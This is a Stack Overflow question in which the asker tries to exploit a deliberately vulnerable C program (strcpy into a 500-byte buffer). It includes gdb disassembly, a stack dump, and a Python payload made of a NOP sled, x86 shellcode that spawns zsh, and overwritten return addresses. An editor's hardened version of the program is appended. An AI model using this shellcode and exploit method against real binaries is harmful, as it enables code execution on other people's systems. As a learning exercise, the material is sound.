Stack Buffer Overflow

#include <stdio.h>
#include <string.h>

int main (int argc, char **argv){
    char buffer[500];
    strcpy(buffer,argv[1]);
    return 0;
}

This is the code I have been working with to exploit the system. What I've been trying to do is overflow the buffer past the base pointer and into the return address and then point back to a spot in the buffer to execute some NOP lines until it hits my shellcode that executes a zsh command line. I've been using this in gdb to just try to get the program to open the zsh command line. So for the format of my string to be entered I use python to generate the string. Before that I used gdb to determine how big my stack buffer is which gave me this:

0x0804843b <+0>:    lea    0x4(%esp),%ecx
0x0804843f <+4>:    and    $0xfffffff0,%esp
0x08048442 <+7>:    pushl  -0x4(%ecx)
0x08048445 <+10>:   push   %ebp
0x08048446 <+11>:   mov    %esp,%ebp
0x08048448 <+13>:   push   %ecx
0x08048449 <+14>:   sub    $0x204,%esp
0x0804844f <+20>:   mov    %ecx,%eax
0x08048451 <+22>:   mov    0x4(%eax),%eax
0x08048454 <+25>:   add    $0x4,%eax
0x08048457 <+28>:   mov    (%eax),%eax
0x08048459 <+30>:   sub    $0x8,%esp
0x0804845c <+33>:   push   %eax
0x0804845d <+34>:   lea    -0x1fc(%ebp),%eax
0x08048463 <+40>:   push   %eax
0x08048464 <+41>:   call   0x8048310 <strcpy@plt>
0x08048469 <+46>:   add    $0x10,%esp
0x0804846c <+49>:   mov    0x4(%ebp),%eax
0x0804846f <+52>:   sub    $0x8,%esp
0x08048472 <+55>:   push   %eax
0x08048473 <+56>:   push   $0x8048510
0x08048478 <+61>:   call   0x8048300 <printf@plt>
0x0804847d <+66>:   add    $0x10,%esp
0x08048480 <+69>:   mov    $0x0,%eax
0x08048485 <+74>:   mov    -0x4(%ebp),%ecx
0x08048488 <+77>:   leave  
0x08048489 <+78>:   lea    -0x4(%ecx),%esp
0x0804848c <+81>:   ret

The first sub call is telling me that the buffer is 0x204 in hex long, or 516 in decimal. I'm not 100% sure why it's 516 and not 500, because it is a char, but that's not the point. My shellcode that I planned on implementing is 43 bytes, and my return address I decided to do 10 times over. So my string is formatted like this:

$(python -c 'print ("\x90" * 457) +"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"')

I just need to add in the return address at this point. I did so by using gdb again to pick a point in my memory where a NOP call was and I just chose in the middle in case of any kind of shift. To do this I printed out 164 places in memory after the $esp.

(gdb) x/164x $esp
0xffffcc40: 0x00000070  0xf7fefe66  0xf7fe922d  0x90909090
0xffffcc50: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcc60: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcc70: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcc80: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcc90: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcca0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffccb0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffccc0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffccd0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcce0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffccf0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd00: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd10: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd20: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd30: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd40: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd50: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd60: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd70: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd80: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcd90: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcda0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcdb0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcdc0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcdd0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcde0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffcdf0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffce00: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffce10: 0x90909090  0x83c03190  0x048801ec  0x7a2f6824
0xffffce20: 0x2f686873  0x686e6962  0x7273752f  0x5650e689
0xffffce30: 0xf3890bb0  0xd231e189  0x01b080cd  0x80cddb31
0xffffce40: 0xf7f95300  0xffffce60  0x00000000  0xf7dfd637
0xffffce50: 0xf7f95000  0xf7f95000  0x00000000  0xf7dfd637
0xffffce60: 0x00000002  0xffffcef4  0xffffcf00  0x00000000
0xffffce70: 0x00000000  0x00000000  0xf7f95000  0xf7ffdc04
0xffffce80: 0xf7ffd000  0x00000000  0xf7f95000  0xf7f95000
0xffffce90: 0x00000000  0x2efe3324  0x6ec91d34  0x00000000
0xffffcea0: 0x00000000  0x00000000  0x00000002  0x08048340
0xffffceb0: 0x00000000  0xf7fedee0  0xf7fe8770  0xf7ffd000
0xffffcec0: 0x00000002  0x08048340  0x00000000  0x08048361

So my new string should look like this:

$(python -c 'print ("\x90" * 457) +"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"+("\x30\xcd\xff\xff"*10)')

Now that I've shown you the process of how I've gotten this far, I can ask my question. Why doesn't this work? I should be replacing everything up to the return address and then causing the address to point back to my NOP calls and then open up my command line, but instead it tells me:

Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()

Any insight would be helpful; I have been working on this issue for quite some time now and just don't know where to go from here.

c
buffer-overflow
asked on Stack Overflow Mar 21, 2017 by Iceechill
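For contrast, a hardened version of the program in the question, added here as an editor's example and not the asker's code: the copy is bounded by the destination size, argv[1] is checked before use, and overlong input is rejected instead of being silently truncated. The helper names bounded_copy and input_fits are assumed.

```c
#include <stdio.h>
#include <string.h>

#define BUFSZ 500

/* Copy src into dst (capacity dstsz) only if it fits, NUL terminator
 * included. Returns 0 on success, -1 if src is NULL or does not fit;
 * dst is left untouched on failure. memchr never reads past dstsz bytes,
 * so an unterminated or overlong src cannot cause an out-of-bounds scan. */
static int bounded_copy(char *dst, size_t dstsz, const char *src) {
    if (src == NULL || dstsz == 0)
        return -1;
    const char *end = memchr(src, '\0', dstsz);
    if (end == NULL)                 /* no NUL within dstsz bytes: too long */
        return -1;
    size_t n = (size_t)(end - src);  /* n < dstsz, so n + 1 bytes fit */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Helper (assumed name): would this argument fit the program's 500-byte
 * buffer? Returns 1 if the bounded copy succeeds, 0 otherwise. */
int input_fits(const char *arg) {
    char buffer[BUFSZ];
    return bounded_copy(buffer, sizeof buffer, arg) == 0;
}

int main(int argc, char **argv) {
    char buffer[BUFSZ];
    /* Reject a missing argument and anything longer than 499 bytes
     * instead of letting strcpy run past the end of buffer. */
    if (argc < 2 || bounded_copy(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "usage: %s <string of at most %d bytes>\n",
                argv[0], BUFSZ - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

Building with the compiler's stack protector enabled (for example gcc's -fstack-protector-strong) adds a second, independent line of defence should a bounds check like this ever be missed.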

0 Answers

Nobody has answered this question yet.

